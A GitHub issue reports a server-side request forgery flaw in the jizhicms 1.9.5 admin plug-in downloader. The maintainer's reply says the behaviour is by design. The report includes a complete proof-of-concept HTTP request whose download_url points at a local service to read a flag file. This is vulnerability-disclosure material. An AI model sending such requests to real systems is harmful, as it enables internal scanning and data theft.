New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
V1.9.5: SSRF Vulnerability #67
Comments
|
Thank you for your letter !
The Version 2.0 supports changing the plug-in address. If you want the system to download a file, you can forge an address and add your special file. You can download it directly without such complexity.
The plug-in module itself has permission control. If you do not have background permission, you will not be able to download plug-ins.
Thank you again for your suggestions, but I'm sorry that the plug-in function model does not require downloading the specified files, but wants to download any files that the administrator wants to download. This is the original intention of my plug-in design. Keeping the administrator account well will be everyone's responsibility. If you lose the background account, you will lose everything.
…------------------ 原始邮件 ------------------
发件人: "Cherry-toto/jizhicms" ***@***.***>;
发送时间: 2022年3月18日(星期五) 晚上9:33
***@***.***>;
***@***.***>;
主题: [Cherry-toto/jizhicms] V1.9.5: SSRF Vulnerability (Issue #67)
SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks
The vulnerability is located in the background plug-in download function
I start a locally accessible Web service with a flag.php file
使用payload
POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.48.135 Content-Length: 93 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.48.135 Referer: http://192.168.48.135//admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=821f3d50fa8cd84139c76be9 Connection: close action=start-download&filepath=mutisite&download_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.php
See the response
Browser accesshttp://192.168.48.135/cache/update_mutisite.zip
open by notepad
As with flag.php, this was read successfully
—
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.
You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>
|
|
Ok, understood |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks
The vulnerability is located in the background plug-in download function
I start a locally accessible Web service with a flag.php file
use payload
See the response
Browser access
http://192.168.48.135/cache/update_mutisite.zipopen by notepad
As with flag.php, this was read successfully
The text was updated successfully, but these errors were encountered: